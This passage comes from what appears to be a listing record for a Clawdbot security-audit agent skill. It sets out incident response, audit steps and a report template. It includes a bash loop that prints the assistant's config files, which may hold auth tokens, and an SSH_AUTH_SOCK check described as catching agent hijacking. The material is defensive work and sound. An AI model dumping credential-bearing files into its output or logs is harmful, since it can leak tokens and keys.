commands\tblocked_commands, restrict_tools\nFile and network access\tsandbox, workspaceAccess: none/ro\nSocial engineering and prompt injection\twrap_untrusted_content, mentionGate\nBrowser session hijacking\tDedicated profile, token auth, HTTPS\nCredential leakage\tlogging.redactSensitive: tools, env vars\nIncident Response\n\nIf a compromise is suspected, follow these steps:\n\nContainment\nStop the gateway process — clawdbot daemon stop\nSet gateway.bind to loopback — \"bind\": \"127.0.0.1\"\nDisable risky DMs and groups — Set to disabled\nRotation\nChange the gateway auth token — clawdbot doctor --generate-gateway-token\nRotate browser control and hook tokens\nRevoke and rotate API keys for model providers\nReview\nCheck gateway logs and session transcripts — ~/.clawdbot/logs/\nReview recent config changes — Git history or backups\nRe-run the security audit with the deep flag — clawdbot security audit --deep\nReporting Vulnerabilities\n\nReport security issues to: security@clawd.bot\n\nDo not post vulnerabilities publicly until they have been fixed.\n\nAudit Execution Steps\n\nWhen running a security audit, follow this sequence:\n\nStep 1: Locate Configuration\nCONFIG_PATHS=(\n \"$HOME/.clawdbot/clawdbot.json\"\n \"$HOME/.clawdbot/config.yaml\"\n \"$HOME/.clawdbot/.clawdbotrc\"\n \".clawdbotrc\"\n)\nfor path in \"${CONFIG_PATHS[@]}\"; do\n if [ -f \"$path\" ]; then\n echo \"Found config: $path\"\n cat \"$path\"\n break\n fi\ndone\n\nStep 2: Run Domain Checks\n\nFor each of the 13 domains above:\n\nParse relevant config keys\nCompare against secure baseline\nFlag deviations with severity\nStep 3: Generate Report\n\nFormat findings by severity:\n\n🔴 CRITICAL: [vulnerability] - [impact]\n🟠 HIGH: [vulnerability] - [impact]\n🟡 MEDIUM: [vulnerability] - [impact]\n✅ PASSED: [check name]\n\nStep 4: Provide Remediation\n\nFor each finding, output:\n\nSpecific config change needed\nExample configuration\nCommand to apply (if safe)\nReport Template\n═══════════════════════════════════════════════════════════════\n🔒 CLAWDBOT SECURITY AUDIT\n═══════════════════════════════════════════════════════════════\nTimestamp: $(date -Iseconds)\n\n┌─ SUMMARY ───────────────────────────────────────────────\n│ 🔴 Critical: $CRITICAL_COUNT\n│ 🟠 High: $HIGH_COUNT\n│ 🟡 Medium: $MEDIUM_COUNT\n│ ✅ Passed: $PASSED_COUNT\n└────────────────────────────────────────────────────────\n\n┌─ FINDINGS ──────────────────────────────────────────────\n│ 🔴 [CRITICAL] $VULN_NAME\n│ Finding: $DESCRIPTION\n│ → Fix: $REMEDIATION\n│\n│ 🟠 [HIGH] $VULN_NAME\n│ ...\n└────────────────────────────────────────────────────────\n\nThis audit was performed by Clawdbot's self-security framework.\nNo changes were made to your configuration.\n\nExtending the Skill\n\nTo add new security checks:\n\nIdentify the vulnerability - What misconfiguration creates risk?\nDetermine detection method - What config key or system state reveals it?\nDefine the baseline - What is the secure configuration?\nWrite detection logic - Shell commands or file parsing\nDocument remediation - Specific steps to fix\nAssign severity - Critical, High, Medium, Low\nExample: Adding SSH Hardening Check\n## 14. SSH Agent Forwarding 🟡 Medium\n\n**What to check:** Is SSH_AUTH_SOCK exposed to containers?\n\n**Detection:**\n```bash\nenv | grep SSH_AUTH_SOCK\n\n\nVulnerability: Container escape via SSH agent hijacking.\n\nSeverity: Medium\n\n\n## Security Assessment Questions\n\nWhen auditing, ask:\n\n1. **Exposure:** What network interfaces can reach Clawdbot?\n2. **Authentication:** What verification does each access point require?\n3. **Isolation:** What boundaries exist between Clawdbot and the host?\n4. **Trust:** What content sources are considered \"trusted\"?\n5. **Auditability:** What evidence exists of Clawdbot's actions?\n6. **Least Privilege:** Does Clawdbot have only necessary permissions?\n\n## Principles Applied\n\n- **Zero modification** - This skill only reads; never changes configuration\n- **Defense in depth** - Multiple checks catch different attack vectors\n- **Actionable output** - Every finding includes a concrete remediation\n- **Extensible design** - New checks integrate naturally\n\n## References\n\n- Official docs: https://docs.clawd.bot/gateway/security\n- Original framework: [ᴅᴀɴɪᴇʟ ᴍɪᴇssʟᴇʀ on X](https://x.com/DanielMiessler/status/2015865548714975475)\n- Repository: https://github.com/TheSethRose/Clawdbot-Security-Check\n- Report vulnerabilities: security@clawd.bot\n\n---\n\n**Remember:** This skill exists to make Clawdbot self-aware of its security posture. Use it regularly, extend it as needed, and never skip the audit." }, "trust": { "sourceLabel": "tencent", "provenanceUrl": "https://clawhub.ai/TheSethRose/clawdbot-security-check", "publisherUrl": "https://clawhub.ai/TheSethRose/clawdbot-security-check", "owner": "TheSethRose", "version": "2.2.2", "license": null, "verificationStatus": "Indexed source record" }, "links": { "detailUrl": "https://openagent3.xyz/skills/clawdbot-security-check", "downloadUrl": "https://openagent3.xyz/downloads/clawdbot-security-check", "agentUrl": "https://openagent3.xyz/skills/clawdbot-security-check/agent", "manifestUrl": "https://openagent3.xyz/skills/clawdbot-security-check/agent.json", "briefUrl": "https://openagent3.xyz/skills/clawdbot-security-check/agent.md" } }